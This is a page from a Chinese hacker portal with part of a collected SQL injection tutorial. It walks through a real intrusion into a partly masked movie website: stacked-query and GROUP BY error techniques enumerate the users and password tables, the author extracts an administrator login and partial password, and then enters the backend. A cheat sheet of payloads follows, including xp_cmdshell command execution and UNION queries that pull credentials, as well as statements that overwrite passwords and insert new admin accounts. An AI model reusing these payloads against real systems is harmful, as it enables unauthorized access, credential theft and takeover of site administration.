| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 | 
服务导航 我要发布 主力频道 空间域名 精华收集 服务器出租 黑客培训 光盘刻录 特色服务 解决方案 我要投诉
您现在的位置: 华夏黑客同盟 >> Hack >> 脚本漏洞攻击 >> 正文 用户登录 新用户注册
Sql脚本注射技巧整理           ★★★ 【字体:
Sql脚本注射技巧整理
作者:不详 文章来源:华盟收集 点击数: 更新时间:2008-1-17

 

第六步:猜重要表的字段 
输入: 
现在就看看users表有哪些字段 
ffff’;update [users] set email=(select top 1 col_name(object_id(’users’),3) from users) where name=’ffff’;-- 
得到第三个字段是password 
ffff’;update [users] set email=(select top 1 col_name(object_id(’users’),4) from users) where name=’ffff’;-- 
得到第四个字段是name 
最后users表的字段共28个全得到了 
(注:另一个得到字段的办法,前提是系统的返回出错信息 
a’ group by ID having 1=1-- 
得到 
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’ 
列 ’users.userid’ 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。 
/user/wantpws.asp,行63 
这个第二个字段就是userid 
显示第三个字段。 
a’ group by id,userid having 1=1-- 
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’ 
列 ’users.password’ 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。 
/user/wantpws.asp,行63 
得到是password 
同理,一直显示出所有。:) 

users表 
1 2 3 4 
id userid password name 
5 6 7 8 9 10 11 12 13 14 15 16 
Province homeaddress city adress starlook sex email nlook nos date money send 
17 18 19 20 21 22 23 24 25 26 27 28 
oklook dnlook lasthits phone askmejoin getmoney payno logintime mflag state post note 

starlook--12 10 2003 2:41PM 
nlook---0 
nos---2 登陆次数 
date--12 10 2003 12:00AM 注册时间? 
money--同上 
send--空 
oklook--0 
dnlook--0 
getmoney--0 
state--0 
note--这家伙很。。。 说明 
password表 
1 2 3 
id name pwd 
然后我又试ad原来是用来记录广告击点的。。 
然后又试password表得到有name和pwd字段。 
执行 
ffff’;update [users] set email=(select top 1 name from password) where name=’ffff’;-- 
可得第一个用户名是admin123看样儿多半是管理员了。 
然后又得到了密码是dy***dick188还是打星号算了哈哈... 
这样我们就完全进入了这个电影网站的后台了哈哈。 
http://www.dy***.com/login.asp 
再进一步还可以知道管理员一共有三人密码也都能看到了。 
ffff’;update [users] set email=(select top 1 count(id) from password) where name=’ffff’;-- 
ffff’;update [users] set email=(select top 1 pwd from password where id=2) where name=’ffff’;-- 
ffff’;update [users] set email=(select top 1 name from password where id=2) where name=’ffff’;-- 
------------------------------------------------------------ 
数据库猜测测试: 
’ or 1=1-- 
" or 1=1-- 
or 1=1-- 
’ or ’a’=’a 
" or "a"="a 
’) or (’a’=’a 
----------------------------------------------------------------------------- 
’; exec master..xp_cmdshell ’ping 10.10.1.2’-- //tftp,防火墙,nc,tcpdump.. 
’; EXEC master..sp_makewebtask "\目标ip\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES" 
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-- 
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_ NAME NOT IN (’table1’)-- 
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_ NAME LIKE ’%25login%25’-- 
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_ NAME=’admin_login’-- 
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_ NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (’login_id’)-- 
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_ NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (’login_id’,’login_name’,’password’,details’)-- 
UNION SELECT TOP 1 login_name FROM admin_login-- 
UNION SELECT TOP 1 password FROM admin_login where login_name=’neo’-- 
UNION SELECT TOP 1 password FROM admin_login where login_name=’trinity’-- 
UNION SELECT TOP 1 convert(int, password%2b’%20morpheus’) FROM admin_login where login_name=’trinity’-- 
;UPDATE ’admin_login’ SET ’password’ = ’newpas5’ WHERE login_name=’neo’-- 
;INSERT INTO ’admin_login’ (’login_id’, ’login_name’, ’password’, ’details’) VALUES (666,’neo2’,’newpas5’,’NA’)-- 
----------------------------------------------------------------------------- 

上一页  [1] [2] 

责任编辑:朱倩  联系方式  Email:朱倩
电话:51228163
  • 上一篇黑客:

  • 下一篇黑客:
  • (只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
    姓 名:
    * 游客填写  ·注册用户
    主 页:
    评 分:
    1分 2分 3分 4分 5分
    评论内容:
    验证码: *
  • 请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。
  • 严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论 。
  • 用户需对自己在使用本站服务过程中的行为承担法律责任(直接或间接导致的)。
  • 本站管理员有权保留或删除评论内容。
  • 评论内容只代表网友个人观点,与本网站立场无关。
  • 最新hack更新
    最新推荐资讯
    相关黑客
    SQL注入原理深度解析
    SQL脚本注射语句总结
    跨站式SQL注入的技巧
    SQL注射改难猜的MD5
    加密术和SQL注入攻击
    突破SQL脚本注入想法
    Sql2005注射辅助脚本
    见过最好的sql注入工具
    SQLInjection基础与技巧
    ASP+SQL入侵方法总结
    最新会员软件
    最新推荐视频
    最新推荐动画

    Copyright @ 2005 77169.Net Inc. All rights reserved. 华夏黑客同盟 版权所有
    北京市电信通提供网络带宽

    mailto:webmaster@77169.net
    咨询QQ号:836982 / 59280880
    联系站长 QQ38588913
    热线电话: 86-10-67634029/676229433
    京ICP证041431号